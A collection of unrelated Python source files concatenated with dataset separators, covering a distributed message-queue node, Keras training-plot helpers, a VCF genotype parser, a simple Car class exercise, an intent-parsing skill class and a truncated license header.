MQ_STATUS_FILENAME = 'mq.status' # file name of message queue status
PRIORITY_STORE_FN = 'store'
BACKUP_STORE_FN = 'backup'
INCR_STORE_FN = 'inc'
CACHE_SIZE = 20
class LocalMessageQueueNode(object):
"""
Message queue node which only handle local mq operations
can also be in charge of handling the remote call.
This node includes several storage such as priority storage
for each priority, incremental storage as well as the
backup storage. Each storage is an instance of
:class:`~cola.core.mq.store.Store`.
"""
def __init__(self, base_dir, rpc_server, addr, addrs,
copies=1, n_priorities=3, deduper=None,
app_name=None):
self.dir_ = base_dir
self.rpc_server = rpc_server
assert addr in addrs
self.addr = addr
self.addrs = addrs
self.other_addrs = [n for n in self.addrs if n != self.addr]
self.copies = max(min(len(self.addrs)-1, copies), 0)
self.n_priorities = max(n_priorities, 1)
self.deduper = deduper
self.app_name = app_name
self._lock = threading.Lock()
self._register_rpc()
self.inited = False
def init(self):
with self._lock:
if self.inited: return
get_priority_store_dir = lambda priority: os.path.join(self.dir_,
PRIORITY_STORE_FN, str(priority))
self.priority_stores = [Store(get_priority_store_dir(i),
deduper=self.deduper,
mkdirs=True) \
for i in range(self.n_priorities)]
backup_store_dir = os.path.join(self.dir_, BACKUP_STORE_FN)
self.backup_stores = {}
for backup_addr in self.other_addrs:
backup_node_dir = backup_addr.replace(':', '_')
backup_path = os.path.join(backup_store_dir, backup_node_dir)
self.backup_stores[backup_addr] = Store(backup_path,
size=512*1024, mkdirs=True)
inc_store_dir = os.path.join(self.dir_, INCR_STORE_FN)
self.inc_store = Store(inc_store_dir, mkdirs=True)
self.inited = True
def _register_rpc(self):
if self.rpc_server:
self.register_rpc(self, self.rpc_server, app_name=self.app_name)
@classmethod
def register_rpc(cls, node, rpc_server, app_name=None):
prefix = get_rpc_prefix(app_name, 'mq')
rpc_server.register_function(node.put_proxy, name='put',
prefix=prefix)
rpc_server.register_function(node.batch_put_proxy, name='batch_put',
prefix=prefix)
rpc_server.register_function(node.put_backup_proxy, name='put_backup',
prefix=prefix)
rpc_server.register_function(node.get_proxy, name='get',
prefix=prefix)
rpc_server.register_function(node.exist, name='exist',
prefix=prefix)
def put(self, objs, force=False, priority=0):
self.init()
priority = max(min(priority, self.n_priorities-1), 0)
priority_store = self.priority_stores[priority]
priority_store.put(objs, force=force)
def put_proxy(self, pickled_objs, force=False, priority=0):
"""
The objects from remote call should be pickled to
avoid the serialization error.
:param pickled_objs: the pickled objects to put into mq
:param force: if set to True will be directly put into mq without
checking the duplication
:param priority: the priority queue to put into
"""
objs = pickle.loads(pickled_objs)
self.put(objs, force=force, priority=priority)
def batch_put(self, objs):
self.init()
puts = defaultdict(lambda:defaultdict(list))
for obj in objs:
priority = getattr(obj, 'priority', 0)
force = getattr(obj, 'force', False)
puts[priority][force].append(obj)
for priority, m in puts.iteritems():
for force, obs in m.iteritems():
self.put(obs, force=force, priority=priority)
def batch_put_proxy(self, pickled_objs):
"""
Unlike the :func:`put`, this method will check the ``priority``
of a single object to decide which priority queue to put into.
"""
objs = pickle.loads(pickled_objs)
self.batch_put(objs)
def put_backup(self, addr, objs, force=False):
self.init()
backup_store = self.backup_stores[addr]
backup_store.put(objs, force=force)
def put_backup_proxy(self, addr, pickled_objs, force=False):
"""
In the Cola backup mechanism, an object will not only be
put into a hash ring node, and also be put into the next
hash ring node which marked as a backup node. To the backup node,
it will remember the previous node's name.
:param addr: the node address to backup
:param pickled_objs: pickled objects
:param force: if True will be put into queue without checking duplication
"""
objs = pickle.loads(pickled_objs)
self.put_backup(addr, objs, force=force)
def put_inc(self, objs, force=True):
self.init()
self.inc_store.put(objs, force=force)
def get(self, size=1, priority=0):
self.init()
priority = max(min(priority, self.n_priorities-1), 0)
priority_store = self.priority_stores[priority]
return priority_store.get(size=size)
def get_proxy(self, size=1, priority=0):
"""
Get the objects from the specific priority queue.
:param size: if size == 1 will be the right object,
else will be the objects list
:param priority:
:return: unpickled objects
"""
return pickle.dumps(self.get(size=size, priority=priority))
def get_backup(self, addr, size=1):
self.init()
backup_store = self.backup_stores[addr]
return backup_store.get(size=size)
def get_inc(self, size=1):
self.init()
return self.inc_store.get(size=size)
def add_node(self, addr):
"""
When a new message queue node is in, firstly will add the address
to the known queue nodes, then a backup for this node will be created.
"""
if addr in self.addrs: return
self.addrs.append(addr)
backup_store_dir = os.path.join(self.dir_, BACKUP_STORE_FN)
backup_node_dir = addr.replace(':', '_')
backup_path = os.path.join(backup_store_dir, backup_node_dir)
self.backup_stores[addr] = Store(backup_path,
size=512*1024, mkdirs=True)
def remove_node(self, addr):
"""
For the removed node, this method is for the cleaning job including
shutting down the backup storage for the removed node.
"""
if addr not in self.addrs: return
self.addrs.remove(addr)
self.backup_stores[addr].shutdown()
del self.backup_stores[addr]
def exist(self, obj):
if self.deduper:
return self.deduper.exist(str(obj))
return False
def shutdown(self):
if not self.inited: return
[store.shutdown() for store in self.priority_stores]
for backup_store in self.backup_stores.values():
backup_store.shutdown()
self.inc_store.shutdown()
class MessageQueueNodeProxy(object):
"""
This class maintains an instance of :class:`~cola.core.mq.node.LocalMessageQueueNode`,
and provide `PUT` and `GET` relative method.
In each mq operation, it will execute a local or remote call by judging the address.
The Remote call will actually send a RPC to the destination worker's instance which
execute the method provided by :class:`~cola.core.mq.node.LocalMessageQueueNode`.
Besides, this class also maintains an instance of :class:`~cola.core.mq.distributor.Distributor`
which holds a hash ring. To an object of `PUT` operation, the object should be distributed to
the destination according to the mechanism of the hash ring. Remember, a cache will be created
to avoid the frequent write operations which may cause high burden of a message queue node.
To `GET` operation, the mq will just fetch an object from the local node,
or request from other nodes if local one's objects are exhausted.
"""
def __init__(self, base_dir, rpc_server, addr, addrs,
copies=1, n_priorities=3, deduper=None,
app_name=None, logger=None):
self.dir_ = base_dir
self.addr_ = addr
self.addrs = list(addrs)
self.mq_node = LocalMessageQueueNode(
base_dir, rpc_server, addr, addrs,
copies=copies, n_priorities=n_priorities, deduper=deduper,
app_name=app_name)
self.distributor = Distributor(addrs, copies=copies)
self.logger = logger
self.prefix = get_rpc_prefix(app_name, 'mq')
self._lock = threading.Lock()
self.inited = False
@classmethod
def register_rpc(cls, node, rpc_server, app_name=None):
LocalMessageQueueNode.register_rpc(node.mq_node, rpc_server,
app_name=app_name)
def init(self):
with self._lock:
if self.inited: return
self.load()
if not hasattr(self, 'caches'):
self.caches = dict((addr, []) for addr in self.addrs)
if not hasattr(self, 'caches_inited'):
self.caches_inited = dict((addr, False) for addr in self.addrs)
if not hasattr(self, 'backup_caches'):
self.backup_caches = dict((addr, {}) for addr in self.addrs)
for addr in self.addrs:
for other_addr in [n for n in self.addrs if addr != n]:
self.backup_caches[addr][other_addr] = []
self.mq_node.init()
self.inited = True
def load(self):
save_file = os.path.join(self.dir_, MQ_STATUS_FILENAME)
if not os.path.exists(save_file):
return
with open(save_file, 'r') as f:
self.caches, self.caches_inited, self.backup_caches = pickle.load(f)
def save(self):
if not self.inited:
return
save_file = os.path.join(self.dir_, MQ_STATUS_FILENAME)
with open(save_file, 'w') as f:
t = (self.caches, self.caches_inited, self.backup_caches)
pickle.dump(t, f)
def _check_empty(self, objs):
if objs is None:
return True
elif isinstance(objs, list) and len(objs) == 0:
return True
return False
def _remote_or_local_put(self, addr, objs, force=False, priority=0):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.put(objs, force=force, priority=priority)
else:
client_call(addr, self.prefix+'put', pickle.dumps(objs),
force, priority)
def _remote_or_local_batch_put(self, addr, objs):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.batch_put(objs)
else:
client_call(addr, self.prefix+'batch_put', pickle.dumps(objs))
def _remote_or_local_get(self, addr, size=1, priority=0):
objs = None
if addr == self.addr_:
objs = self.mq_node.get(size=size, priority=priority)
else:
objs = pickle.loads(client_call(addr, self.prefix+'get',
size, priority))
addr_caches = self.caches.get(addr, [])
if size == 1 and objs is None and len(addr_caches) > 0:
return addr_caches.pop(0)
elif size > 1 and len(objs) == 0 and len(addr_caches) > 0:
return addr_caches[:size]
return objs
def _remote_or_local_put_backup(self, addr, backup_addr, objs,
force=False):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.put_backup(backup_addr, objs, force=force)
else:
client_call(addr, self.prefix+'put_backup', backup_addr,
pickle.dumps(objs), force)
def put(self, objects, flush=False):
"""
Put a bunch of objects into the mq. The objects will be distributed
to different mq nodes according to the instance of
:class:`~cola.core.mq.distributor.Distributor`.
There also exists a cache which will not flush out unless the parameter flush
is true or a single destination cache is full.
:param objects: objects to put into mq, an object is mostly the instance of
:class:`~cola.core.unit.Url` or :class:`~cola.core.unit.Bundle`
:param flush: flush out the cache all if set to true
"""
self.init()
addrs_objs, backup_addrs_objs = \
self.distributor.distribute(objects)
if flush is True:
for addr in self.addrs:
if addr not in addrs_objs:
addrs_objs[addr] = []
if addr not in backup_addrs_objs:
backup_addrs_objs[addr] = {}
for addr, objs in addrs_objs.iteritems():
self.caches[addr].extend(objs)
if not self.caches_inited[addr] or \
len(self.caches[addr]) >= CACHE_SIZE or flush:
try:
self._remote_or_local_batch_put(addr, self.caches[addr])
except socket.error, e:
if self.logger:
self.logger.exception(e)
else:
self.caches[addr] = []
if not self.caches_inited[addr]:
self.caches_inited[addr] = True
for addr, m in backup_addrs_objs.iteritems():
for backup_addr, objs in m.iteritems():
self.backup_caches[addr][backup_addr].extend(objs)
size = sum([len(obs) for obs in \
self.backup_caches[addr].values()])
if size >= CACHE_SIZE or flush:
for backup_addr, objs in self.backup_caches[addr].iteritems():
try:
self._remote_or_local_put_backup(
addr, backup_addr, objs)
except socket.error, e:
if self.logger:
self.logger.exception(e)
else:
self.backup_caches[addr][backup_addr] = []
def get(self, size=1, priority=0):
"""
Get a bunch of objects from the message queue.
This method will try to fetch objects from local node as much as wish.
If not enough, will try to fetch from the other nodes.
:param size: the objects wish to fetch
:param priority: the priority queue which wants to fetch from
:return: the objects which to handle
"""
self.init()
if size < 1: size = 1
results = []
_addrs = sorted(self.addrs, key=lambda k: k==self.addr_,
reverse=True)
for addr in _addrs:
left = size - len(results)
if left <= 0:
break
objs = None
try:
objs = self._remote_or_local_get(addr, size=left,
priority=priority)
except socket.error, e:
if self.logger:
self.logger.exception(e)
if objs is None:
continue
if not isinstance(objs, list):
objs = [objs, ]
results.extend(objs)
if size == 1:
if len(results) == 0:
return
return results[0]
return results
def put_inc(self, objs):
self.mq_node.put_inc(objs)
def get_inc(self, size=1):
return self.mq_node.get_inc(size=size)
def flush(self):
self.put([], flush=True)
def add_node(self, addr):
if addr in self.addrs: return
self.init()
self.distributor.add_node(addr)
self.addrs.append(addr)
self.caches[addr] = []
self.caches_inited[addr] = False
self.backup_caches[addr] = {}
for o_addr in self.addrs:
if o_addr != addr:
self.backup_caches[addr][o_addr] = []
self.backup_caches[o_addr][addr] = []
self.mq_node.add_node(addr)
def remove_node(self, addr):
if addr not in self.addrs: return
self.init()
self.distributor.remove_node(addr)
self.addrs.remove(addr)
self.mq_node.batch_put(self.caches[addr])
del self.caches[addr]
del self.caches_inited[addr]
del self.backup_caches[addr]
for o_addr in self.addrs:
if o_addr != addr:
del self.backup_caches[o_addr][addr]
self.flush()
BATCH_SIZE = 10
objs = self.mq_node.get_backup(addr, size=BATCH_SIZE)
while len(objs) > 0:
self.mq_node.batch_put(objs)
objs = self.mq_node.get_backup(addr, size=BATCH_SIZE)
self.mq_node.remove_node(addr)
def exist(self, obj):
return self.mq_node.exist(obj)
def shutdown(self):
if not self.inited: return
self.mq_node.shutdown()
self.save()
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.shutdown()
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
import tensorflow as tf
import keras as keras
def print_elapsed_time(total_time):
''' Prints elapsed time in hh:mm:ss format
'''
hh = int(total_time / 3600)
mm = int((total_time % 3600) / 60)
ss = int((total_time % 3600) % 60)
print(
"\n** Total Elapsed Runtime: {:0>2}:{:0>2}:{:0>2}".format(hh, mm, ss))
def plot_accuracy(history):
# get accuracy histories
training_acc = history.history['acc']
validation_acc = history.history['val_acc']
# ceate count of the number of epochs
epoch_count = range(1, len(training_acc) + 1)
# visualize accuracy history
plt.plot(epoch_count, training_acc, 'r--')
plt.plot(epoch_count, validation_acc, 'b-')
plt.legend(['Training Accuracy', 'Validation Accuracy'])
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.show()
def plot_loss(history):
# get loss histories
training_loss = history.history['loss']
validation_loss = history.history['val_loss']
# create count of the number of epochs
epoch_count = range(1, len(training_loss) + 1)
# visualize loss history
plt.plot(epoch_count, training_loss, 'r--')
plt.plot(epoch_count, validation_loss, 'b-')
plt.legend(['Training Loss', 'Validation Loss'])
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.show()
# Visualize original and sugmented Images
# refer https://github.com/udacity/aind2-cnn for details
def print_versions():
print("Tensorflow version: {}".format(tf.__version__))
print("Keras version: {}".format(keras.__version__))
def visualize_augmented_images(training_data, datagen, image_count):
# take subset of training data
training_data_subset = training_data[:image_count]
# visualize subset of training data
fig = plt.figure(figsize=(20, 2))
for i in range(0, len(training_data_subset)):
ax = fig.add_subplot(1, image_count, i+1)
ax.imshow(training_data_subset[i])
fig.suptitle('Subset of Original Training Images', fontsize=20)
plt.show()
# visualize augmented images
fig = plt.figure(figsize=(20, 2))
for x_batch in datagen.flow(training_data_subset, batch_size=12):
for i in range(0, image_count):
ax = fig.add_subplot(1, image_count, i+1)
ax.imshow(x_batch[i])
fig.suptitle('Augmented Images', fontsize=20)
plt.show()
break
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
import re
import sys
import gzip
import pysam
#import itertools
import mimetypes
from collections import OrderedDict #,defaultdict
class VCF(object):
"""docstring for VCF"""
def __init__(self,
input,
output=None,
populations=None,
region=None,
window_size=1,
step=0,
snvs=None,
empty_vcf_line=None):
super(VCF, self).__init__()
self.input = input
self.output = output
self.step = step
self.populations = populations
self.region = region
self.window_size = window_size
self.header = self.__extract_header__()
self.chrms_2_sizes = self.__get_chrm_ids_and_sizes__()
self.empty_vcf_line = self.make_empty_vcf_ordered_dict()
def __open_vcf__(self):
"""Open vcf file as gzip or as text."""
if type(self.input) is file:
fin = self.input
elif mimetypes.guess_type(self.input)[-1] is 'gzip':
fin = gzip.open(self.input, 'rb')
else:
fin = open(self.input, 'r')
return fin
def __extract_header__(self):
#print [line.strip() for line in self.__open_vcf__()]
header = []
for line in self.__open_vcf__():
if line.startswith("#") == True:
header.append(line.strip())
else:
break
return header
def __get_chrm_ids_and_sizes__(self):
""" Extract chromosome ids and sizes from vcf file.
Return as dictionary"""
chrms_sizes_dict = OrderedDict()
# with self.__open_vcf__() as fin:
for line in self.header:
if line.startswith("##contig"):
chrm_name = re.findall(r'ID=.*,', line)
chrm_name = chrm_name[0].strip('ID=').strip(',')
chrm_length = re.findall(r'length=.*>', line)
chrm_length = int(chrm_length[0].strip('length=').strip('>'))
chrms_sizes_dict[chrm_name] = chrm_length
break
return chrms_sizes_dict
def make_empty_vcf_ordered_dict(self):
"""Open VCF file and read in #CHROM line as an Ordered Dict"""
header_dict = None
for line in self.header:
if line.startswith("#CHROM"):
header = line.strip("#").strip().split()
header_dict = OrderedDict([(item, None) for item in header])
break
return header_dict
def process_snp(self, snp_call):
if snp_call == "0/0":
return (0,0)
elif snp_call == "1/1":
return (1,1)
elif snp_call == '1/0' or \
snp_call == '0/1':
return (0,1)
# skip multiallelic sites
else:
return None
def process_snp_call(self, snp_call, ref, alt, IUPAC_ambiguities=False):
"""Process VCF genotype fields."""
# IUPAC ambiguity codes
IUPAC_dict = {('A', 'C'): 'M',
('A', 'G'): 'R',
('A', 'T'): 'W',
('C', 'G'): 'S',
('C', 'T'): 'Y',
('G', 'T'): 'K',
('A', 'C', 'G'): 'V',
('A', 'C', 'T'): 'H',
('A', 'G', 'T'): 'D',
('C', 'G', 'T'): 'B'}
if snp_call == None:
called_base = "-"
if snp_call["GT"] == "./.":
called_base = "-"
else:
allele1, allele2 = snp_call["GT"].split("/")
# process "0/0"
if allele1 == '0' and allele2 == '0':
called_base = ref
if allele1 == '1' and allele2 == '1':
called_base = alt
# process "0/N"
if allele1 == '0' and allele2 != '0':
if IUPAC_ambiguities == False:
called_base = 'N'
else:
call = [ref] + [alt.split(',')[int(allele2) - 1]]
call.sort()
call = tuple(call)
called_base = IUPAC_dict[call]
# process "2/2, 1/2, etc."
if int(allele1) >= 1 and int(allele2) > 1:
# deal with homozygotes
if allele1 == allele2:
called_base = alt.split(',')[int(allele1) - 1]
# deal with heterozygotes
else:
if IUPAC_ambiguities == False:
called_base = 'N'
else:
ref = alt.split(',')[int(allele1) - 1]
alt = alt.split(',')[int(allele2) - 1]
call = [ref, alt]
call.sort()
call = tuple(call)
called_base = IUPAC_dict[call]
return called_base
def count_alleles(self, chunk):
results = []
for line in chunk:
pop_counts = {}
for pop in self.populations.keys():
allele_counts = {'REF':0, 'ALT':0}
for sample in self.populations[pop]:
if line[sample] != None:
ref, alt = self.process_snp(line[sample]['GT'])
allele_counts['REF'] += ref
allele_counts['ALT'] += alt
pop_counts[pop] = allele_counts.copy()
results.append(pop_counts.copy())
return results
def vcf_slice_iterator(self, vcf_bgzipped_file, region):
tbx = pysam.Tabixfile(vcf_bgzipped_file)
try:
vcf_slice = tbx.fetch(*region)
except ValueError:
print 'bad vcf slice:', region
sys.exit()
else:
for row in vcf_slice:
yield self.parse_vcf_line(row, self.empty_vcf_line)
#return ((chrm, start, stop), chunk)
#return tuple(row for row in vcf_slice)
def vcf_file_iterator(self, as_dict=True):
for line in self.__open_vcf__():
if line.startswith("#") is not True:
if as_dict == True:
yield self.parse_vcf_line(line, self.empty_vcf_line.copy())
else:
yield line
else:
continue
def parse_info_field(self, info_field):
info_dict = {}
for item in info_field.split(';'):
pair = item.split("=")
if len(pair) == 2:
info_dict[pair[0]] = pair[1] # this could be improved on
return info_dict
def get_population_sizes(self, vcfline):
sample_counts = {}
for pop in self.populations.keys():
sample_count = 0
for sample in self.populations[pop]:
if vcfline[sample] is not None:
sample_count += 1
sample_counts[pop] = sample_count
return sample_counts
def parse_vcf_line(self, pos, vcf_line_dict):
"""Read in VCF line and convert it to an OrderedDict"""
pos_parts = pos.strip().split()
for count, item in enumerate(vcf_line_dict):
vcf_line_dict[item] = pos_parts[count]
sample_format = vcf_line_dict["FORMAT"].split(":")
for count, item in enumerate(vcf_line_dict):
if count >= 9:
genotype = vcf_line_dict[item]
if "./." in genotype or ".|." in genotype or genotype == ".": # "'./.'' for dip, '.' for haploid
vcf_line_dict[item] = None
else:
genotype = dict(zip(sample_format, genotype.split(":")))
# CONVERT STRINGS TO APPOPRIATE TYPES (INTS, FLOATS, ETC.)
if genotype.has_key("GQ"):
genotype['GQ'] = float(genotype['GQ'])
if genotype.has_key("DP"):
genotype['DP'] = int(genotype['DP'])
if genotype.has_key("AD"):
genotype['AD'] = tuple(int(ad) for ad in genotype['AD'].split(","))
if genotype.has_key("PL"):
genotype['PL'] = tuple(int(ad) for ad in genotype['PL'].split(","))
vcf_line_dict[item] = genotype
vcf_line_dict['POS'] = int(vcf_line_dict['POS'])
try:
vcf_line_dict['QUAL'] = float(vcf_line_dict['QUAL'])
except ValueError:
pass
vcf_line_dict['INFO'] = self.parse_info_field(vcf_line_dict['INFO'])
return vcf_line_dict.copy()
def lines_2_dicts(self, chunk):
vcf_line_dict = self.empty_vcf_line.copy()
return [self.parse_vcf_line(line, vcf_line_dict) for line in chunk]
def get_chromosome_lengths(self, regions_to_skip=[]):
try:
tbx = pysam.Tabixfile(self.input) # TODO: create try statement to test that file is actually a VCF
except:
print 'Input not Tabix Indexed.'
sys.exit()
# PARSE LENGTH INFO FROM HEADER
chrm_lengths = []
chrm_lengths_dict = {}
for line in tbx.header:
if line.startswith("##contig="):
chrm_name = re.findall(r'ID=.*,', line)
chrm_name = chrm_name[0].strip('ID=').strip(',')
chrm_length = re.findall(r'length=.*>', line)
chrm_length = int(chrm_length[0].strip('length=').strip('>'))
if chrm_name in regions_to_skip:
print 'skipping', chrm_name
continue
chrm_lengths.append((chrm_name, 1, chrm_length))
chrm_lengths_dict[chrm_name] = chrm_length
chrm_lengths = tuple(chrm_lengths)
tbx.close()
return chrm_lengths_dict
def get_slice_indicies(self):
"""Get slice information from VCF file that is tabix indexed (bgzipped). """
# GENERATE SLICES:
# Does not yield final partial slice. Not a bug!
#print [c for c in self.chrms_2_sizes.iteritems()]
if self.region == [None]:
# ITERATE OVER CHROMOSOMES (USE ORDERED DICT TO KEEP IN VCF ORDER)
for chrm, length in self.chrms_2_sizes.iteritems():
cStart = 0
cStop = 0
iCount = 0
while cStop < length:
if iCount == 0:
cStart = 1
cStop = self.window_size
iCount += 1
yield (chrm, cStart, cStop)
cStart += self.step
cStop += self.step
else:
chrm, start, stop = self.region
cStart = 0
cStop = 0
iCount = 0
if self.window_size == None:
self.window_size = stop - start
if self.step == None:
self.step = 0
while cStop < stop:
if iCount == 0:
cStart = start
cStop = start + self.window_size - 1
iCount += 1
yield (chrm, cStart, cStop)
if self.step == 0:
cStart += self.window_size
else:
cStart += self.step
cStop = cStart + self.window_size + self.step - 1
def snp_chunks_interator(self, num_snv_per_chunk=3, fillvalue=None):
def grouper(iterable, n):
"""Yields chunks of SNV of n number of SNVs.
Properly handles chromsome so that
chunks don't overlap chromosomes."""
chrom = None
chunk = []
for count, i in enumerate(iterable):
#s = i.split("\t")[:3]
current_chrom = i["CHROM"]
if count == 0:
chrom = current_chrom
if current_chrom != chrom:
yield chunk
chunk = [i]
chrom = current_chrom
continue
if current_chrom == chrom:
chunk.append(i)
if len(chunk) >= n:
yield chunk
chunk = []
chrom = current_chrom
chunk_iterator = grouper(self.vcf_file_iterator(), n=num_snv_per_chunk)
for c, i in enumerate(chunk_iterator):
if len(i) == 0: # handles edge case
continue
if len(i) != num_snv_per_chunk:
padding = num_snv_per_chunk - len(i)
i.extend([fillvalue]*padding)
yield i
def calc_allele_counts(self, vcf_line_dict, sample_ids=None):
#allele_counts = defaultdict({0:0.0,1:0.0,2:0.0,3:0.0,4:0.0})
allele_counts = dict((key, {0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0}) for key in self.populations.keys())
for population in self.populations.keys():
for sample_id in self.populations[population]:
if vcf_line_dict[sample_id] != None:
genotype = vcf_line_dict[sample_id]
genotype = genotype["GT"].split("/") # TODO add phased logic
if genotype == [".", "."]:
continue
genotype = [int(item) for item in genotype]
for allele in genotype:
allele_counts[population][allele] += 1.0
return allele_counts
def calc_heterozygosity(self, vcf_line_dict, sample_ids=None):
heterozygosity = dict((key, 0) for key in self.populations.keys())
for population in self.populations.keys():
het_count = 0.0
total_samples = 0.0
for sample_id in self.populations[population]:
if vcf_line_dict[sample_id] != None:
genotype = vcf_line_dict[sample_id]
genotype = genotype["GT"].split("/") # TODO add phased logic
if genotype == [".", "."]:
continue
genotype = map(int, genotype)
if genotype[0] != genotype[1]:
het_count += 1
total_samples +=1
try:
heterozygosity[population] = het_count / total_samples
except:
heterozygosity[population] = 0.0
return heterozygosity
|
nilq/baby-python
|
python
|
"""
Создать класс Car. Атрибуты: марка, модель, год выпуска, скорость (по умолчанию 0).
Методы: увеличить скорости (скорость +5), уменьшение скорости (скорость -5),
стоп (сброс скорости на 0), отображение скорости, задния ход (изменение знака скорости).
"""
class Car:
def __init__(self, brand, model, year, speed):
# атрибуты(свойства)
self.brand = brand
self.model = model
self.year = year
self.speed = speed
# методы
def increase_speed(self):
self.speed += 5
def reduce_speed(self):
self.speed -= 5
def stop(self):
self.speed = 0
def current_speed(self):
print(f"Your speed: {self.speed} km/h")
def reverse(self):
self.speed *= -1
if __name__ == "__main__":
my_car = Car("Toyota", "Camry", 2017, 0)
my_car.increase_speed()
my_car.reduce_speed()
my_car.stop()
my_car.current_speed()
my_car.reverse()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import importlib
import itertools
from string import Formatter
from adapt.intent import IntentBuilder
from adapt.engine import DomainIntentDeterminationEngine
from padatious import IntentContainer
from padatious.util import expand_parentheses
class EntitiesDict(dict):
def __missing__(self, key):
return '{' + key + '}'
class Skill(object):
def __init__(self, root_dir, name, nlp, active):
self._root_dir = root_dir
self._name = name
self._nlp = nlp
self._active = active
self._intents_container = None
self._adapt_intent_engine = None
self.initialize_intent_parser()
def is_active(self):
return self._active
def get_name(self):
return self._name
def initialize_intent_parser(self):
self._intents_container = IntentContainer("%s_cache" % self._name)
self._adapt_intent_engine = DomainIntentDeterminationEngine()
self._adapt_intent_engine.register_domain(self._name)
for intent_name, intent_file_path in self.get_intent_names():
#print ("###### IntentBuilder: %s, %s" % (intent_name, intent_file_path))
adapt_intent_builder = IntentBuilder(intent_name)
for intent_name, intent_example_sentences_array in self.intent_training_file_content(intent_file_path, 'intent'):
#print ("add intent %s, %s" % (intent_name, intent_example_sentences_array))
self._intents_container.add_intent(intent_name, intent_example_sentences_array)
for entity_name, entities_array in self.intent_training_file_content(intent_file_path, 'entities'):
#print ("add entity %s, %s " % (entity_name, entities_array))
self._intents_container.add_entity(entity_name, entities_array)
# adapt
if entity_name.endswith("_keyword"):
for k in entities_array:
#print ("add keyword %s to %s" % (k, intent_name))
self._adapt_intent_engine.register_entity(k, entity_name, domain=self._name)
adapt_intent_builder.require(entity_name)
adapt_intent=adapt_intent_builder.build()
self._adapt_intent_engine.register_intent_parser(adapt_intent, domain=self._name)
self._intents_container.train(debug=False)
def get_intent_file_content(self, skill_file_path):
content_array = []
with open(skill_file_path, 'r', encoding='utf-8') as skill_file:
for entry in skill_file:
content_array.append(entry)
return content_array
def get_entities_file_content(self, skill_file_path, allow_variations):
content_array = []
with open(skill_file_path, 'r', encoding='utf-8') as skill_file:
for entry in skill_file:
entries, variations=entry.strip().split('|'),[]
content_array.append(entries[0])
if allow_variations:
if len(entries) > 1:
content_array.extend(entries[1].split(','))
return content_array
def get_intent_names(self):
intent_root_file_path=os.path.join(self._root_dir, self._name, 'intents')
for intent_name in os.listdir(intent_root_file_path):
intent_file_path=os.path.join(intent_root_file_path, intent_name)
yield intent_name, intent_file_path
def intent_training_file_content(self, artefacts_root_dir, artefact_file_extension, allow_variations=True):
for artefact_file_path in os.listdir(artefacts_root_dir):
if artefact_file_path.endswith('.' + artefact_file_extension):
artefact_name = artefact_file_path.replace('.' + artefact_file_extension, '')
if artefact_file_extension is 'entities':
artefact_file_lines = self.get_entities_file_content(os.path.join(artefacts_root_dir, artefact_file_path), allow_variations)
elif artefact_file_extension is 'intent':
artefact_file_lines = self.get_intent_file_content(os.path.join(artefacts_root_dir, artefact_file_path))
yield artefact_name, artefact_file_lines
def expand_intents(self, include_additional_entities=False):
# load entities first in the file and build a dictionary
result = dict()
entities_dict = dict()
for intent_name, intent_file_path in self.get_intent_names():
for entity_type, entities_array in self.intent_training_file_content(intent_file_path, 'entities', False):
entities_dict[entity_type]=entities_array
# load intents again from file
for intent_type, intent_array in self.intent_training_file_content(intent_file_path, 'intent'):
intent_sentences = set()
for line in intent_array:
line_tokens = self._nlp.tokenization.tokenize(line)
expanded = expand_parentheses(line_tokens)
for sentence_tokens in expanded:
sentence = self._nlp.tokenization.detokenize(sentence_tokens)
fieldnames = [fname for _, fname, _, _ in Formatter().parse(sentence) if fname]
fields_dict = dict()
for fieldname in fieldnames:
if fieldname in entities_dict:
fields_dict[fieldname]=entities_dict[fieldname].copy()
else:
if include_additional_entities:
field_values = self.get_additional_entities(fieldname)
if len(field_values) > 0:
fields_dict[fieldname]=field_values
if len(fields_dict) > 0:
keys, values = zip(*fields_dict.items())
permutations = [dict(zip(keys, v)) for v in itertools.product(*values)]
for p in permutations:
entities_dict_permutation = EntitiesDict(p)
intent_sentences.add(sentence.format(**entities_dict_permutation))
else:
intent_sentences.add(sentence)
result[intent_type] = list(intent_sentences)
return result
def get_additional_entities(self, fieldname):
return []
def calculate_intent(self, text):
text = self._nlp.preprocess(text)
# example result
# {'intent_type': 'beth.fydd.y.tywydd', 'confidence': 1.0, 'target': None, 'keyword': 'tywydd'}
#
#print ("evaluating: %s with adapt:" % text)
adapt_best_confidence=0.0
adapt_result = self._adapt_intent_engine.determine_intent(text)
for a in adapt_result:
# print (a)
if a["confidence"] > adapt_best_confidence:
adapt_best_confidence=a["confidence"]
# example result
# {'sent': "beth yw ' r tywydd", 'name': 'beth.ywr.tywydd', 'conf': 1.0, 'matches': {'tywydd_keyword': 'tywydd?'}}
#
#print ("evaluating: %s with padatious:" % text)
padatious_result = self._intents_container.calc_intent(text)
return adapt_best_confidence, padatious_result
def handle(self, intent, latitude, longitude):
pass
|
nilq/baby-python
|
python
|
"""
This is companion code to Project 4 for CSEP576au21
(https://courses.cs.washington.edu/courses/csep576/21au/)
Instructor: Vitaly Ablavsky
"""
# ======================================================================
# Copyright 2021 Vitaly Ablavsky https://corvidim.net/ablavsky/
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
